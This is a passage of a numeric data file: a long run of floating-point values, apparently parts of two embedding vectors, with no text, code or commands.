,0.015182581,-0.0033198798,-0.013284085,-0.00501608,-0.0051664435,0.009854958,-0.017428331,-0.017070213,0.027866144,0.0056136744,-0.0034503862,0.026773851,0.009855297,-0.0028932653,0.0017483808,-0.014476822,0.0040067453,0.014181839,-0.010197752,0.016016724,0.0055501102,-0.0020570604,0.03812884,-0.0058227777,-0.010842171,-0.019489974,-0.0046300483,-0.012806353,-0.009406305,-0.02103515,-0.013936097,-0.02041022,-0.028141785,-0.0069012158,-0.010251236,0.005334159,-0.009295761,-0.0016515497,-0.17064929,-0.0042172284,-0.01995087,-0.022203498,-0.018639294,-0.006218869,0.009548107,0.015962722,0.004457379,-0.018187556,-0.022879321,0.031049853,0.014838572,0.005511378,0.002429669,0.007965908,-0.02298463,-0.009885596,-0.010797849,0.002426044,-0.00287922,-0.029348133,-0.007495013,-0.0058619333,0.008454118,0.0021886355,-0.0138208745,-0.007961021,0.017410077,0.0030749335,-0.020036845,0.0036767554,0.017540962,0.013776495,0.017047737,0.006937657,0.0100969095,-0.009255483,-0.0071585807,0.019342212,0.0012399119,0.02230469,-0.010510317,0.017933048,0.007513698,-0.00033497947,0.0054640905,0.024255404,0.03179068,0.017760731,-0.016740397,0.020884989,0.0030798079,-0.010606766,-0.0070810295,-0.004528269,0.00380519,0.004910732,0.009827732,-0.003169384,-0.017415168,0.0020671925,0.00039989033,-0.000034347628,0.0051520765,0.001156547,-0.020875152,-0.0023850482,-0.008624285,-0.009912625,0.0013479443,0.018096635,0.0058331196,-0.002741065,-0.014099996,0.009933374,0.029112227,-0.0103106275,-0.009416917,0.0348045,-0.017311316,0.0140039865,-0.0034750437,0.028307645,-0.01340958,-0.014060553,0.0062183454,0.009665393,-0.0023926054,-0.0056997174,0.0018181519,-0.002450964,-0.010655272,-0.021721264,-0.017931418,0.004317127,-0.008199273,0.02002641,-0.0023280093,-0.006998705,-0.0055011846,-0.0022542076,-0.020731771,-0.014328997,-0.12374788,-0.0013686565,0.033047315,0.025690345,-0.010943657,-0.022844624,0.0013157505,-0.0045104045,0.020674871,-0.00005508565,0.008193586,0.011629966,0.010551461,0.008973261,0.00959809,0.013224408,-0.031297125,-0.00528043,0.0025312884,0.006508914,-0.0007778315,0.0031113771,0.000114308794,0.010839867,-0.020298637,-0.011372255,0.015903737,0.0460965,0.01450232,-0.013813154,-0.00030817967,0.00804469,0.007480787,0.003318191,-0.06807563,-0.005554576,0.021029362,0.000117260744,0.0030405854,0.02427668,-0.0057864184,-0.012992535,0.006434346,0.013195583,-0.0051925383,-0.005995963,0.0021070866,0.009278761,-0.0029311173,-0.006747426,-0.012586243,0.0065627815,-0.003685957,-0.008023115,0.017132161,-0.029965188,0.0019628785,0.009247468,-0.011731242,-0.00045359114,0.004818248,0.015036974,-0.0083964765,0.01809818,-0.013789123,0.010009663,0.011171414,0.0046253484,0.0034379596,0.015378708,-0.0098867295,0.029194344,0.0075023747,-0.007389132,0.022442266,0.0065972833,0.001996247,0.034243017,0.016172456,0.010841025,-0.00014929305,-0.011995773,-0.008473801,0.005743853,-0.020441439,0.01221662,0.0025180907,-0.0042947545,-0.034340743,0.019450493,-0.0021660437,-0.006826494,-0.01064452,0.024223194,0.017026793,0.0028969292,0.051646847,-0.0052949437,-0.02164707,-0.008258351,-0.011894899,-0.00073909335,-0.0078036906,-0.003552547,-0.011208473,0.019935425,0.042784218,0.0072096786,-0.012136944,-0.0074409917,0.005329471,0.0051730387,-0.01294467,0.002520752,-0.002716828,0.013403733,0.0028880392,-0.0009966436,0.0018345865,0.007845923,0.008596135,-0.022008834,0.009593335,-0.022869145,0.0030077877,-0.017704654,0.0027878191,0.019762136,0.021104304,-0.017449986,0.00063696573,-0.0058229943,0.019157514,-0.006683956,0.0035529889,0.017703835,-0.02163829,0.0036454103,0.016420955,0.001453671,-0.001894482,0.011990418,-0.0047294674,-0.0058914893,0.0002615571,0.003420714,-0.009218365,-0.0122761335,-0.011115284,-0.0022090254,-0.000761891,-0.010978597,0.01581456,0.02161592,0.013819846,0.0031491017,0.003925843,0.00021219942,0.017782254,0.019247405,-0.020816324,0.03127295,0.023688639,0.0052565625,-0.003382441,0.0036482331,-0.016645845,0.027676577,-0.015631858,0.011294958,-0.016648898,-0.006202324,-0.0027296415,-0.036540277,0.011070947,0.00014864601,0.005661665,0.030890098,0.011203162,0.016096335,-0.027136816,0.0050384714,-0.019023018,-0.005240678,-0.0060839965,0.018856023,-0.0084289955,-0.025047407,0.0071220393,-0.0069875894,0.046224244,0.0033091272,-0.014718817,-0.013895482,0.016332524,0.004986311,0.0027615773,0.0027628273,-0.0072066467,-0.023853874,-0.020835528,0.002705359,0.009132346,-0.013727474,0.0068428083,0.013437498,0.0041361055,0.026345935,0.020409627,-0.012825495,-0.010743223,0.01152296,0.007080691,0.00467854,0.01305655,0.0002583653,0.00064947223,-0.024964044,0.026988398,0.0036094312,0.0010975066,-0.014623274,0.0078123654,0.008732905,-0.0042455336,0.022552764,0.016484044,0.008380133,-0.036277756,-0.013162652,0.011940323,0.0061380793,-0.01436004,-0.02933572,0.0037154935,-0.007120791,0.0019104275,0.007904138,0.0007259139,0.00067150575,0.021684807,0.02061999,0.022565586,-0.002297995,0.009069363,-0.0059873466,0.022628155,0.008019906,0.023434892,0.039226968,-0.005724799,0.0047187135,-0.0044901907,0.00096883526,-0.013254411,0.0071314727,0.0073773204,0.007882869,-0.0071385526,-0.0014044745,-0.026512433,-0.0012024387,-0.0025347802,-0.022858376,0.00895829,-0.011486911,-0.010081063,-0.013567547,-0.0039884723,0.006274201,0.013609388,0.0057332204,-0.0120572215,0.013221562,-0.024756948,-0.013873746,0.022178566,-0.009174713,0.006539604,0.017724287,0.009525928,-0.0035183462,-0.0018124077,0.008064014,-0.017213719,0.003315216,0.013794154,-0.006503644,0.0060157916,0.009231074,0.013934134,-0.00080646045,-0.021330845,-0.016782502,-0.0065985243,0.02067107,0.018257998,-0.009982366,-0.01618717,-0.006373652,0.0005868124,-0.00413592,0.0015363637,0.008257011,0.00919795,-0.004150597,-0.009011817,0.010286797,0.010226737,-0.005090532,0.005974674,0.013777927,-0.025226034,0.0361835,0.014991802,0.0078091966,-0.019600837,-0.0017480302,-0.062365144,-0.024827113,-0.029427588,-0.023334948,0.017939057,-0.021824084,0.0036043378,-0.017577467,-0.0043833028,0.038056247,-0.015960753,0.002631833,0.027973685,-0.039243463,-0.018536897,-0.011297809,0.01981141,-0.00197775,0.007339722,0.03035799,-0.012806424,0.015527395,-0.0031870075,0.013139082,0.01093847,-0.009369207,-0.0024460626,0.0020677762,0.00503182,-0.013671306,-0.0061558937,-0.0055301795,-0.0053722006,0.016516855,-0.004746011,-0.006640643,-0.033241313,0.03988592,-0.025352096,-0.004165599,0.010705669,-0.0026334089,-0.023581216,-0.008758266,0.0141153,-0.0057107,0.008895037,-0.019968031,-0.008717843,0.006169986,0.0041889315,0.01669733,0.0021023867,0.009064525,-0.022144787,-0.020475872,-0.0108840875,-0.10073841,0.012698123,0.016306741,0.023388024,0.03941528,0.0022320997,0.0013087488,0.008651769,0.01940994,0.0029132557,-0.0087029375,-0.00084716914,-0.029915504,-0.01144507,0.02563644,0.0034401638,-0.020774974,0.025707746,-0.006440397,-0.022089673,0.0009344293,0.016686996,-0.011663611,-0.016221918,0.025729429,0.020615373,0.007010871,-0.013014337,0.0038889637,0.006434329,-0.0005888677,-0.0062356796,-0.0050813314,-0.014096163,-0.009336651,0.0076050228,-0.008468367,0.011770661,-0.00599762,0.0004023213,-0.0044436734,-0.0010466726,0.026076777,0.006713761,0.0035119227,-0.004271513,-0.0220527,0.0021299745,0.00033005272,0.01219861,-0.015172606,-0.005626401,-0.0055655614,-0.007972536,0.0038283514,0.017423293,0.011856592,-0.027000459,0.022513011,0.004949817,-0.02945267,-0.015391027,0.014135163,0.010097253,-0.0055893934,0.0034702776,-0.006001973,0.0068020737,-0.00800706,0.005763329,-0.0056218924,-0.028583743,-0.0147636505,0.012991054,-0.010726135,0.0068475315,0.012566205,-0.018540887,-0.032512516,-0.009699152,0.06229598,0.0034715652,0.011777372,0.015881576,0.024566954,-0.001053968,0.0027458284,-0.006131375,0.02192205,0.00918155,0.00295244,0.004149307,0.00838392,-0.0018603874,0.00087427144,0.028952572,-0.014940237,-0.0038246328,0.018680956,-0.0008582909,0.025072338,0.0016110305,-0.010133548,-0.007320889,-0.011194381,-0.0005100675,-0.003582831,-0.012991965,-0.009355404,-0.0127759725,0.000119027245,0.01829582,0.017059477,0.037999626,0.012606526,0.012797439,-0.014036721,0.029364955,-0.0016314284,-0.027776914,-0.010176132,-0.017638836,-0.011457271,0.028805433,-0.0011413204,0.001472123,-0.000855424,0.0046565346,-0.0077190953,-0.0010562995,0.0017573993,0.014791843,0.01881272,0.012670683,-0.023716627,0.0052544703,-0.029971836,0.015007247,0.008174412,0.025586028,-0.013981428,-0.01627773,0.0014135205,-0.002556861,-0.05158778,0.0131819565,0.0017765034,0.0011268324,-0.0021288628,-0.030539326,-0.0071126847,0.0041108574,0.015262143,0.013239097,-0.0040943916,0.015151897,0.012001527,0.0046412535,-0.03219916,-0.008655168,-0.0011745178,-0.0020699976,0.0050285095,-0.012105169,-0.019565677,0.014225312,0.019907342,0.0035968763,0.0054357895,0.0073548383,-0.019042047,0.0056510856,0.0064148614,0.0009220924,-0.010709214,-0.009952966,0.032513507,0.02971677,-0.0050015463,0.014292685,-0.020154806,0.022950863,-0.001890384,0.0027120828,-0.019273404,-0.013711051,0.009353278,-0.002881534,0.0051486343,-0.005631434,-0.009710592,0.007990548,-0.010708606,0.0014837498,-0.015425619,-0.009851159,0.016660884,0.0062076272,-0.0061323107,0.0033371362,-0.024513524,-0.0019539036,-0.021319529,0.0039076675,0.021337721,0.011310301,-0.004462416,0.0053951484,-0.021827824,-0.013875959,-0.008647892,0.0011764134,0.016467959,0.13062283,0.01655469,-0.0029487503,0.0053642206,0.008137349,-0.010990136,0.019246483,0.011604052,0.008360397,-0.0030130292,0.0074018748,-0.010941483,0.013780502,-0.007088916,-0.01776732,0.014565878,0.029758485,-0.015513266,0.008918736,0.0040778858,0.008297383,-0.024112714,-0.0149833225,-0.08692792,-0.02154066,-0.07283609,0.031805888,0.011390872,0.013682008,0.02952495,0.01009277,0.0037157373,-0.012375399,-0.00887448,-0.00873638,0.011656735,-0.0070443866,-0.011202643,-0.00612428,-0.014382079,0.021699436,0.008962642,0.009931852,-0.037900925,-0.018039372,-0.012517227,0.0069906972,-0.0002634678,0.0041191806,-0.0029713036,-0.0054465528,0.002413981,-0.004028491,0.0001271312,0.014775899,-0.019857325,0.020801825,0.008860172,-0.00050820387,-0.013804592,0.0070955222,-0.009231072,0.0108618885,-0.00957307,-0.0062648263,0.017467713,-0.020415375,-0.010602613,-0.003369522,0.0020017962,0.011813141,-0.019496923,0.011881005,0.0028081662,0.004766314,-0.007028902,-0.009922201,-0.0031278837,0.0036418608,-0.0018901615,-0.005666904,-0.0015244777,0.003886133,0.0011959473,0.0037535164,0.0022030922,-0.023422856,0.02329243,-0.013520985,-0.008088027,-0.008374299,0.035544343,0.021618264,0.008210205,-0.0075173657,0.009767988,0.03044781,0.0012082366,-0.017299032,-0.00931713,-0.021963129,-0.008752589,0.0082783345,0.0117086405,-0.009823851,0.0023733315,-0.0037076026,-0.0013251164,-0.017579615,0.0031457408,0.0011516154,0.023767658,-0.0006784058,0.008237814,-0.007050404,0.011689459,-0.02451312,-0.016585456,0.01870551,-0.012019678,0.0034337384,0.005741635,0.018312652,0.01868134,0.020701025,0.012584101,-0.01914931,-0.01314794,0.0054693418,-0.0011707823,0.0067702252,-0.029157523,0.012290108,0.027129684,-0.014218463,0.009366702,0.0160435,0.00094626873,0.012316167,0.008837076,-0.0019547741,0.0014193705,0.020713337,-0.013240357,0.01333545,-0.019489633,0.041718166,-0.010011162,0.005031995,0.01741231,-0.006867766,0.010440994,-0.01024069,-0.014243144,-0.014691116,-0.005985772,-0.024786292,0.0124419,0.008675001,-0.013095023,0.016911307,0.008044083,0.010196914,-0.028831955,0.023020871,0.01895557,0.01016271,0.0043080943,0.016423631,-0.0059405016,0.011173755,0.0019143645,0.014967919,0.0008828722,-0.025183521,0.02431288,0.02260271,0.028100554,0.00008663083,-0.0020661748,0.01000118,-0.00018813256,-0.0010018339,-0.010275633,0.045127887,0.005647541,-0.0028114843,-0.0018313992,-0.0121196285,0.051442467,-0.010117118,-0.0052540973,-0.0025488227,0.01127182,-0.003572113,0.01987895,-0.034784675,0.041986875,-0.030149484,-0.042358898,-0.0052937185,-0.019828942,0.020035988,-0.014068457,0.0014370506,-0.01969337,0.00025136006,-0.019644527,0.0043963473,-0.0075234496,0.015158522,-0.0011090476,0.012941986,-0.021661067,-0.010092639,0.014413971,-0.009563401,-0.023348697,-0.0016577936,0.0151743,0.0028529882,-0.004719283,-0.008301903,-0.008419412,-0.011790255,0.010146076,-0.0018046584,-0.006842333,0.016771395,0.001462725,-0.0069186636,0.0077151135,-0.00932437,0.0028011496,-0.004401354,0.00020393984,0.02916429,0.0030690716,-0.0072550117,0.010239543,-0.0045866026,0.013416365,0.014635487,0.0038444796,-0.02468218,0.0069455886,-0.010345904,0.0030818796,-0.0021030488,-0.017379457,-0.007269579,0.0035433213,-0.0144778695,-0.004340729,-0.02486255,-0.018324448,0.012814632,0.030090008,0.016057795,-0.004631443,0.025157163,0.005322176,-0.0023409158,0.028238716,-0.007014191,0.006311057,-0.0032543181,-0.008573435,0.012839168,-0.00526948,-0.011801289,-0.0014935402,-0.018671036,0.01730349,0.009484497,0.007457791,0.008728092,-0.0056288596,0.0015162184,-0.016980682,0.019189,-0.024024429,0.003428223,-0.01670991,-0.0060694516,0.0024555686,-0.009189983,0.019272113,0.06599118,-0.06562197,-0.012441349,0.014459639,-0.024992863,-0.011946388,0.021770928,-0.005955215,-0.026607575,-0.031476457,0.016323261,0.017374678,-0.006669308,-0.03579214,-0.01741831,0.014008571,-0.0061688204,0.0077375104,0.006356188,-0.010984912,-0.017760947,0.021003017,-0.010209252,-0.0017193981,0.0032991702,-0.008744505,-0.0065746615,-0.0053914776,0.006453729,0.0039111353,0.010435066,0.01358025,0.021977725,-0.02516557,0.008719241,-0.0032130422,0.009771247,0.009500947,0.0051812665,-0.030700274,-0.03043318,-0.009144375,-0.016248576,-0.006632696,0.029043682,-0.010928607,-0.0013501542,0.024144094,-0.023536706,0.1251429,0.004946639,-0.00060946523,0.013320294,-0.0005782956,-0.008977043,0.0031357878,0.024859155,-0.0017953619,0.01285907,0.008215657,-0.003334911,0.0044276286,0.022354798,-0.0017777898,-0.01319687,0.015403827,0.12883005,-0.0058790874,0.016580498,0.014958332,0.015269919,0.007945554,0.010606339,0.016388355,-0.07995184,-0.005389748,-0.047513187,0.014281206,0.0011208372,-0.036636714,0.013977105,-0.0025817973,-0.012085775,-0.020657029,0.028417086,-0.010816232,0.010966263,-0.015574943,-0.012247795,-0.0039257854,-0.0050076027,-0.01201721,0.0016704412,-0.013676414,0.010337793,-0.03725958,0.014180567,0.0077281357,0.025819402,0.012060014,-0.0012407467,0.010024671,-0.016178124,0.0034353945,0.0061015636,-0.013826955,0.0227512,-0.02829291,0.014241363,-0.032017857,0.010970248,-0.008845103,0.033843122,-0.023714188,-0.0012577719,-0.0095795635,0.013946143,0.023582175,0.022427015,0.020961441,0.024925835,-0.016803829,-0.0041853474,0.0026390746,0.0082307495,-0.0032991716,-0.0052428013,0.01954817,-0.0012997473,0.023495883,-0.0022286992,-0.020524161,0.0022412934,0.007873042,0.02874096,0.017071186,-0.015467808,0.016772214,-0.009736654,-0.0005933384,0.020159492,0.0037372478,0.009830935,0.0019209613,0.011543355,0.005309416,0.0031866953,0.016712936,-0.019320138,-0.015260837,0.023840575,0.0136668105,0.0059448774,0.002331817,-0.005016979,-0.00077137235,-0.021522816,-0.00062697043,0.01767694,-0.0033867857,-0.0028334486,0.00336751,0.020618845,-0.0043269126,-0.017022498,0.0003783771,0.004425421,-0.03452427,-0.017355038,-0.004434659,0.0036988023,-0.0018432817,0.008135562,-0.018567914,-0.007992114,0.010454088,0.0370419,-0.008912471,-0.002512197,0.01448271,0.005397805,0.027566388,0.08288954,-0.011325854,-0.025941784,0.020884192,-0.02062403,-0.04167549,-0.011795383,-0.0055974983,0.008115538,0.004956451,0.010546204,-0.013135921,-0.0073140594,-0.01631878,-0.012283539],[0.005139213,0.00938065,-0.01589394,-0.0067016785,-0.0016396095,-0.023555987,-0.0067986334,0.02183516,-0.003942446,-0.009832269,0.00671087,0.022163888,-0.006607785,0.011834864,-0.024097094,0.0061351405,0.020304643,-0.006727457,-0.0018915519,0.010023647,0.0033591562,-0.0108859725,0.011916706,-0.014369051,0.01683221,0.0077358643,-0.015678694,0.009258425,0.006300977,0.0008178369,0.0043152445,0.015001306,0.019192118,-0.013747035,0.0031464484,-0.008083952,-0.007778282,-0.030615011,0.003203728,-0.0083697615,-0.0050028265,0.01660422,0.002056266,0.0077455896,-0.003859592,-0.00085887883,-0.007426995,0.008971518,-0.007380993,0.0040483344,-0.009605038,-0.017989837,-0.017812302,0.021955717,-0.012056916,0.019177925,-0.00024704818,-0.012399873,0.0034232063,-0.0057413373,0.0026571422,-0.00018834385,-0.022432186,-0.027722023,0.022875752,-0.019175518,0.0081403,0.0018704458,-0.000532313,-0.038634732,-0.007890424,0.0018713813,0.0039635254,-0.008782025,0.012291225,-0.0009335225,0.012965679,-0.026963338,-0.021476235,0.008945749,-0.009469083,0.00734029,-0.0070429267,-0.029955335,0.0010504855,0.007012881,-0.02323097,-0.00037489075,-0.015901066,-0.051812124,-0.004576348,-0.00063872134,0.00013121944,0.0039377585,-0.02354414,0.005815254,0.01192723,0.015770117,-0.0046210233,0.015301583,-0.00040378715,0.0028827172,-0.040885054,0.013956996,0.0058836825,-0.013707684,-0.00994181,-0.010761792,-0.011538256,0.0009128144,0.00082030124,0.015882706,0.018449267,0.003253336,0.0023747112,-0.0037586922,0.004906924,0.021486953,-0.013444847,0.021136198,0.00034010614,0.025919022,0.015485768,-0.0056827087,-0.0127522135,-0.013520345,-0.01234564,0.010066801,0.015982661,0.0054599713,-0.00018638275,0.002147418,0.0001838102,-0.017840166,-0.0024890997,-0.003916521,-0.007138208,-0.03627774,-0.0020760861,-0.025585787,0.009601859,-0.0043033105,0.0018366465,-0.0044539697,0.049323685,0.028070563,-0.0070317867,0.033915464,0.017452255,-0.024287539,0.019296924,0.0045757922,0.008963332,-0.01881749,0.022018095,0.03256934,0.0054872814,-0.0035669957,-0.01583728,-0.0024674905,-0.03258582,0.01107009,-0.010830051,-0.02652671,-0.015404639,-0.050016332,0.010333927,0.006589176,-0.018274168,0.0029468788,0.025983913,0.018986925,0.0135919,-0.0036513072,-0.0033416615,0.037145074,0.0015559002,-0.020700553,-0.006695855,-0.0061580273,0.025207339,0.02360904,0.0062406342,0.0066524744,-0.0045674173,0.012450885,0.00586985,-0.02482746,-0.023099776,0.0029060962,0.023813052,-0.010854923,-0.014490518,0.002892651,-0.004118802,-0.03182409,-0.022147844,0.102717556,-0.012959011,0.012318449,-0.025114069,0.0014188542,0.00632356,-0.022420846,-0.01572876,-0.011544068,-0.0054809176,-0.011772411,0.025452653,-0.0053834203,-0.0043462976,-0.0049959086,-0.005501302,0.015119999,0.011386266,-0.054806616,0.00082419027,0.010506261,0.006965794,0.0016877258,-0.013709119,0.0015767724,0.032730557,-0.04463987,-0.00012231962,-0.013575323,0.007829622,-0.0019601828,0.013168798,-0.023749048,0.004970216,0.023802193,-0.022549106,-0.01369792,0.0040203463,-0.015292437,-0.0137126,-0.008116771,0.0069018337,0.005734584,-0.014545268,0.00400726,0.014960725,0.030117286,-0.017471302,-0.0012522395,0.012436633,0.0077343816,-0.006748053,-0.009130598,0.034574836,-0.0033550377,0.017775957,0.028484672,-0.0010294036,-0.008950335,0.0042453813,-0.013978011,0.00533586,-0.0010792916,0.016561644,0.020849846,-0.008598239,0.037091047,0.03511315,0.01529677,0.020041188,-0.032691885,-0.00051191694,0.0051549105,-0.0075421794,0.0013124748,-0.010264278,-0.003988936,-0.006199982,0.0014188077,0.005206989,0.01670549,-0.0035404582,-0.0063656266,-0.0046839826,0.01424465,-0.002318903,-0.021830615,-0.015448149,0.010403589,-0.01448966,0.0037966412,0.024359787,-0.0036975655,0.015358759,-0.0019276721,0.02002413,0.012358683,-0.00401683,-0.031341672,-0.0003502975,-0.008236784,0.0038981705,-0.022525668,0.004826212,-0.014714922,0.03027119,0.002580192,-0.0013391924,-0.004035069,-0.003771913,0.03848863,-0.014003851,0.024545247,-0.014806386,-0.0071311193,-0.036274843,-0.011053645,0.007056704,-0.008627814,-0.013041142,-0.014931046,-0.016985955,0.0017009404,0.021213809,-0.016631901,0.0002454842,-0.023943547,-0.0136884805,-0.0023017677,0.001525647,-0.012409928,0.002026517,0.0029960393,-0.015391912,0.03135162,0.026081324,0.0148673635,0.0036697185,0.037828904,-0.024076223,0.0071556387,0.0041571255,0.006483274,-0.015870053,-0.0027376825,0.0012456418,0.009963333,-0.0059184222,-0.0046751755,-0.024202004,0.0031813942,0.035308246,0.00049918593,0.014295038,-0.003465817,0.0073276544,-0.023687193,-0.0017121256,0.0032986358,-0.0048700524,-0.03130554,0.023997469,-0.010463928,0.03275888,0.008111779,0.0064488817,0.008984929,0.07835526,-0.011163625,0.0027522612,-0.009811187,-0.03540682,0.0074944473,0.016936418,0.0048975837,0.006615699,0.00088429323,-0.017509151,-0.02795261,0.0048749894,0.008471506,-0.0013037567,0.017420938,-0.01425563,-0.014708047,-0.0016857601,-0.0063095675,0.044411454,-0.023166807,-0.0028517018,0.031270772,0.0071378187,0.012192457,0.0011746081,-0.010957639,0.003405756,-0.013366923,-0.009477573,-0.0046743634,-0.006167727,0.012994146,-0.050677694,0.014835755,0.0036764974,-0.00010483194,-0.00007092791,-0.005696172,0.016271912,0.013893232,-0.007626686,-0.008746781,-0.010611196,0.03338559,0.01525899,0.009229953,-0.018092578,0.021393005,-0.0078052087,0.029770838,-0.016178913,0.009236443,0.0041076555,0.030436082,0.019763056,-0.030333461,0.026910394,0.023138976,0.008677478,0.016069641,-0.0006652182,-0.016024569,-0.0025434839,0.043979045,-0.013782723,-0.011266491,-0.0039027934,-0.006955879,0.0015681672,0.020770673,-0.0022528344,0.0053935344,-0.008498505,0.015352057,-0.01595071,0.018562466,-0.0022921355,0.010669292,-0.015122712,-0.005499159,-0.000043633554,-0.0016654129,-0.026248727,-0.000650023,-0.008123187,0.0023364236,0.017597815,-0.015220435,-0.020342458,0.011297037,0.010042524,0.022528937,0.032286037,0.003867511,0.016490487,0.027642028,-0.021852467,-0.0068726144,0.0011534451,-0.016166162,-0.0025647166,0.0012966152,-0.0074059037,0.0045397063,0.027098425,-0.0073171016,0.0031370055,0.013698877,-0.021908527,0.007904523,0.013285131,0.005033066,-0.00036011904,-0.04742134,-0.0018108833,-0.017172076,-0.017088523,0.009949281,-0.00092609524,0.010439881,0.0046953443,0.00720293,-0.014659254,-0.003318942,-0.02488844,-0.022203188,-0.010708168,0.03176461,0.0027721643,0.016338503,0.011165678,-0.038510483,0.026096554,-0.024237402,-0.019522678,-0.046230704,0.025677364,0.0028382144,0.025631765,0.011072724,0.03894194,-0.022260867,0.0031843754,0.021216521,0.027592666,0.005979759,-0.017376704,-0.0042115315,-0.0020064244,0.0067882757,-0.004137689,-0.004996475,0.013390644,-0.0020389766,0.024303023,-0.027939592,-0.00031289758,0.0069811745,0.0117417425,-0.018477298,0.02014488,-0.005075596,-0.011053225,0.014164599,0.015078516,0.03854007,-0.03404584,-0.025305647,-0.015207216,0.0061639217,-0.0046700086,-0.011620885,0.005894716,-0.015094227,0.007451644,0.0109635275,0.011640848,0.016442288,0.008263695,-0.013835203,-0.008873809,0.013662272,0.006446869,-0.0287554,-0.015652593,0.019601502,-0.00844132,-0.011564998,-0.020716682,-0.0038040963,-0.009637389,0.033152238,0.006213931,-0.018866159,-0.008885384,-0.0013826962,-0.008125627,0.0058695422,-0.0024470305,0.0037869283,0.005570998,0.010622769,-0.009340462,-0.01981807,0.026924072,-0.014085575,0.008139686,-0.011570289,0.011468926,0.029521547,-0.014965486,0.0022243424,0.00920293,0.016566388,-0.005009546,-0.0075992527,0.018678555,0.0063133105,0.013337882,-0.0038739685,0.001230975,0.009544969,0.004921656,0.011242845,0.0074318233,-0.0147521775,0.0035917922,-0.017529866,-0.0011662659,0.0064991107,-0.014648227,0.019276898,-0.0094469,-0.014592828,-0.0073098587,0.013214711,0.00066357316,-0.0005010561,-0.010448464,0.025414754,-0.00038101897,-0.017052926,0.014304915,0.00905362,-0.016852269,-0.005622769,0.012898737,-0.011519396,-0.0042899377,0.021013966,-0.0069136107,-0.012730861,-0.005012366,0.004439047,0.0061558406,0.0096690655,-0.021464605,0.019234356,0.025427582,-0.003927825,0.0053803385,-0.003945506,-0.021350056,-0.0033327348,-0.004348755,-0.02952372,-0.0012039088,-0.0095271105,0.02559506,-0.012306956,-0.006729199,0.030305367,0.011324118,0.0021570295,-0.025304703,0.01819418,-0.044397116,-0.0138919335,0.0036028267,0.015534366,-0.007156816,0.048883315,0.043295115,0.012948458,-0.009558108,0.009024158,-0.0057511036,-0.012109752,0.002057835,0.021220025,0.009429021,0.0038926394,-0.045695074,-0.027778352,-0.018265445,-0.031912692,-0.038044345,0.045168705,-0.009086981,0.006742105,0.006877621,0.0031987552,-0.015229278,0.010866803,0.002002423,-0.04743097,0.007898442,0.018791188,0.0024671704,0.005598788,0.0065982067,-0.005001525,-0.0070875124,-0.023468537,-0.012958285,0.008010172,-0.009806635,-0.028055992,-0.0070583583,0.028082868,-0.025782611,0.035659764,-0.027683072,0.0114413025,-0.014531726,0.037257895,0.017058164,0.021161404,-0.007719558,0.025173625,-0.011770266,0.0013212945,0.008171753,0.01839472,0.019476365,-0.00024006104,-0.007911712,0.014541985,-0.0056196703,-0.045564122,-0.0044984273,0.019856546,0.041532192,-0.018235905,0.013017256,-0.007011606,0.013510928,0.015298764,0.0026299637,0.008356715,0.03094476,0.008971002,0.018290797,0.031691495,-0.007093717,-0.006370337,-0.022948144,-0.020984225,-0.0044932296,0.020998396,0.021430869,0.015947007,0.008895502,0.008879522,0.016288005,0.010131049,-0.025207456,-0.0064825965,0.009886374,-0.009045413,-0.006102371,-0.023200057,-0.017845226,-0.0325213,-0.018812811,0.021979786,-0.001786398,-0.0103743775,-0.014738276,-0.0011390271,0.0030754432,-0.012450793,-0.027347097,-0.0030436595,0.010932517,0.026047539,-0.019377021,-0.0068557397,0.010889746,0.0057532354,0.0188201,0.0116729215,-0.02061444,-0.015085829,-0.006577865,0.00117697,0.024954902,0.016009947,0.012439175,0.007987476,-0.015796244,-0.0050623594,-0.0053904597,-0.001821052,-0.021434333,-0.015895005,-0.0067174304,0.0037753428,0.012550977,0.0034323735,-0.017451879,-0.013275275,0.020310199,-0.026545055,-0.018978221,0.001242872,0.014750299,-0.018764349,0.020633124,-0.015548334,0.024006272,0.025396448,-0.017450139,0.0028854045,-0.013235226,0.003747496,0.0351459,0.010364652,-0.009267232,-0.031385917,-0.013359655,0.0019262577,-0.02003525,0.005427073,0.0122805545,-0.01719651,-0.016727453,-0.0286278,0.012188531,-0.018819923,-0.013263501,0.005558866,-0.032707267,0.037783224,-0.01840963,0.022720058,-0.0035630125,0.0031939168,0.0030956897,0.009507639,0.015454877,-0.038308084,-0.010076703,0.015020955,-0.033185106,0.014832351,0.0061359596,-0.013872643,-0.018116,-0.034959592,0.0033040931,-0.015207987,0.016045317,0.0092968065,-0.025077207,-0.021717018,0.0022154306,-0.020094974,0.019701568,-0.025127046,-0.005740373,0.010011125,0.0045525134,0.011916516,0.01805814,-0.019579476,0.008386043,0.016965505,-0.02550887,0.019836033,-0.021923319,0.014251245,-0.014323061,-0.0002060406,0.0029515582,-0.0122522535,0.019242218,-0.006129225,-0.0029976,0.014783439,-0.029434687,0.011609643,0.005057604,-0.018896163,-0.019725556,-0.008436134,0.016209418,-0.009947931,0.012112704,0.013149657,-0.010050477,0.0023703852,-0.009777073,0.035556003,-0.011943959,0.0035783632,0.03533452,-0.0049376204,-0.02354201,-0.021627938,-0.0011133623,-0.013732805,0.0057013137,0.011850393,-0.0065515107,0.011412007,0.019751446,-0.030381383,-0.019581856,0.015489972,-0.028075783,0.0048130215,0.03931828,0.0007184693,-0.009987152,0.0040774117,0.032133214,-0.03596397,-0.011980999,-0.017579433,-0.012131066,0.018350905,-0.003420359,-0.0023904806,-0.0040347255,0.0026750346,0.010203804,-0.010558685,-0.027002392,-0.0057851723,0.031458512,0.011482385,-0.000022960901,0.013294648,-0.0060727326,-0.01342172,0.011667595,-0.0034377342,0.0031344737,0.012787749,-0.009068244,0.0058126845,0.014347529,0.00014480484,0.0041010026,0.0058779605,0.0026116497,0.012207803,0.029739447,0.009836818,0.013043265,-0.024322694,-0.013528845,-0.0003700111,-0.009474311,-0.021922791,-0.021397945,0.018257363,0.016581472,-0.0060435724,-0.005467986,-0.02106465,-0.05497749,0.005613978,-0.0014159419,-0.0066705174,0.017994273,0.019585656,0.010491383,0.010817644,0.04219054,-0.008871,0.0042722123,0.00795081,0.008190302,0.0087442305,0.0068382053,-0.022951553,-0.021120295,-0.002877394,0.02168803,0.012042513,-0.012675083,0.011579189,0.0028712093,0.009561995,0.04368241,0.009651745,-0.00929265,-0.01131964,-0.026860088,0.012819048,-0.002064732,0.027993824,-0.014081625,-0.0013697838,-0.024571719,0.00825732,0.024446331,0.01079719,-0.01376387,-0.011218249,-0.0069358735,-0.009991363,0.003465994,0.034656603,-0.0045082895,-0.033364486,0.022904124,-0.01596621,-0.00873103,-0.0058407458,0.02375386,0.0012558703,-0.013172297,0.0125446385,-0.018314859,0.021037944,-0.001734881,0.0044166753,0.011808424,0